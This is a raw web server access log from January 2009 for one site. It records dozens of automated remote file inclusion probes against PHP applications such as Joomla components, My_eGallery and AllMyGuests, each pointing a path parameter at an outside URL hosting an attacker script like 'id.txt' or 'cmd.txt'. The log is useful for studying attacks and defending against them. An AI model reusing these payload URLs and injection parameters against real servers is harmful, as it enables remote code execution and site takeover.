200.40.34.42 - - [06/Jan/2009:09:38:32 -0800] "GET /logs/access_080613.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:38:36 -0800] "GET /logs/access_081123.log/index.php?option=com_xfaq&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:38:37 -0800] "GET /index.php?option=com_xfaq&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95134 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:38:37 -0800] "GET /logs/index.php?option=com_xfaq&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:38:54 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:38:54 -0800] "GET /logs/access_080401.log//modules/My_eGallery/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:38:54 -0800] "GET /logs/access_080507.log//modules/My_eGallery/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:09:38:54 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:39:00 -0800] "GET /logs/access_080223.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
119.205.209.69 - - [06/Jan/2009:09:39:00 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:39:03 -0800] "GET /logs/access_080128.log/index.php?option=com_directory&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:39:04 -0800] "GET /index.php?option=com_directory&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95169 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:39:05 -0800] "GET /logs/index.php?option=com_directory&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.40.34.42 - - [06/Jan/2009:09:39:05 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:39:09 -0800] "GET /logs//main.php?p=http://www.geocities.com/jakautama30/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:39:09 -0800] "GET /main.php?p=http://www.geocities.com/jakautama30/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:39:09 -0800] "GET /logs/access_071116.log//main.php?p=http://www.geocities.com/jakautama30/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:39:10 -0800] "GET /main.php?p=http://h1.ripway.com/budi212/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:39:10 -0800] "GET /logs/access_071116.log//main.php?p=http://h1.ripway.com/budi212/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:39:10 -0800] "GET /logs//main.php?p=http://h1.ripway.com/budi212/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:39:15 -0800] "GET /logs/access_080306.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [06/Jan/2009:09:39:15 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
222.236.47.182 - - [06/Jan/2009:09:39:15 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
222.236.47.182 - - [06/Jan/2009:09:39:15 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:39:23 -0800] "GET /logs/access_080510.log//main.php?p=http://www.geocities.com/jakautama30/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:39:24 -0800] "GET /logs/access_080510.log//main.php?p=http://h1.ripway.com/budi212/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:39:25 -0800] "GET /logs/access_080314.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:39:26 -0800] "GET /logs/access_080209.log/index.php?option=com_directory&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:39:32 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:39:32 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:39:32 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.89.90 - - [06/Jan/2009:09:39:33 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [06/Jan/2009:09:39:33 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.236.47.182 - - [06/Jan/2009:09:39:35 -0800] "GET /logs/access_080524.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
65.98.89.90 - - [06/Jan/2009:09:39:38 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:39:43 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:39:43 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:39:43 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:39:43 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:39:43 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:39:43 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:39:43 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:39:45 -0800] "GET /logs/access_080627.log%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.89.90 - - [06/Jan/2009:09:39:53 -0800] "GET /logs/access_080524.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:39:59 -0800] "GET /logs/access_080408.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.81.169 - - [06/Jan/2009:09:40:00 -0800] "GET /logs/access_081203.log HTTP/1.0" 200 2646084 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:40:01 -0800] "GET /logs/access_080123.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.14.183.136 - - [06/Jan/2009:09:40:02 -0800] "GET /logs/access_080524.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:40:09 -0800] "GET /logs/access_081106.log/index.php?option=com_xfaq&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:40:15 -0800] "GET /logs/access_080220.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.226.166.122 - - [06/Jan/2009:09:40:23 -0800] "GET /logs/access_080223.log/errors.php?error=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.226.166.122 - - [06/Jan/2009:09:40:23 -0800] "GET /errors.php?error=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.226.166.122 - - [06/Jan/2009:09:40:24 -0800] "GET /logs/errors.php?error=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:40:28 -0800] "GET /logs/access_080226.log%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:40:43 -0800] "GET /logs/access_081024.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:40:44 -0800] "GET /logs/access_080113.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:40:44 -0800] "GET /logs/access_081114.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:40:54 -0800] "GET /logs/access_080607.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:40:54 -0800] "GET /logs/access_080728.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.226.166.122 - - [06/Jan/2009:09:40:55 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:41:06 -0800] "GET /logs/access_080917.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:41:21 -0800] "GET /logs/access_080321.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:41:38 -0800] "GET /logs/access_080913.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:41:38 -0800] "GET /logs/access_080207.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:41:50 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:41:50 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:41:50 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:41:50 -0800] "GET /logs/access_081203.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.7.194.31 - - [06/Jan/2009:09:41:50 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.101.68.240 - - [06/Jan/2009:09:42:16 -0800] "GET /logs//admin/classes/errors.php?error=http://user666.fileave.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.101.68.240 - - [06/Jan/2009:09:42:17 -0800] "GET /admin/classes/errors.php?error=http://user666.fileave.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:42:18 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:42:18 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:42:18 -0800] "GET /logs/access_080207.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:42:18 -0800] "GET /logs/access_080129.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.182 - - [06/Jan/2009:09:42:52 -0800] "GET /logs/access_080627.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:42:52 -0800] "GET /logs/access_080221.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:43:01 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:43:05 -0800] "GET /logs/access_081002.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.235.18.7 - - [06/Jan/2009:09:43:08 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
119.235.18.7 - - [06/Jan/2009:09:43:08 -0800] "GET /logs/access_080627.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.98.1.107 - - [06/Jan/2009:09:43:17 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
208.98.1.107 - - [06/Jan/2009:09:43:17 -0800] "GET /logs/access_080513.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
208.98.1.107 - - [06/Jan/2009:09:43:18 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:43:18 -0800] "GET /logs/access_081203.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
119.235.18.7 - - [06/Jan/2009:09:43:24 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:09:43:40 -0800] "GET /logs/access_081120.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:43:47 -0800] "GET /logs/access_080828.log/index.php?option=com_mambowiki&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:43:48 -0800] "GET /index.php?option=com_mambowiki&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95153 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:43:49 -0800] "GET /logs/index.php?option=com_mambowiki&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:43:50 -0800] "GET /logs/access_080505.log/index.php?option=com_thopper&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:43:51 -0800] "GET /index.php?option=com_thopper&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95155 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:09:43:52 -0800] "GET /logs/index.php?option=com_thopper&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:44:03 -0800] "GET /logs/access_080627.log%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.235.18.7 - - [06/Jan/2009:09:44:07 -0800] "GET /logs/access_080522.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.30.81.169 - - [06/Jan/2009:09:44:21 -0800] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:09:44:33 -0800] "GET /logs/access_080226.log%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:44:35 -0800] "GET /logs/access_080705.log/claroline/inc/claro_init_header.inc.php?includePath=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:44:35 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:44:35 -0800] "GET /logs/access_080524.log/claroline/inc/claro_init_header.inc.php?includePath=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.139.67.70 - - [06/Jan/2009:09:44:35 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://oursoultvxq.com/bbs/data/vip/id2.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.95.39.220 - - [06/Jan/2009:09:44:38 -0800] "GET /logs/access_080304.log//tools/send_reminders.php?noSet=0&includedir=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.95.39.220 - - [06/Jan/2009:09:44:38 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:44:38 -0800] "GET /logs/access_080207.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
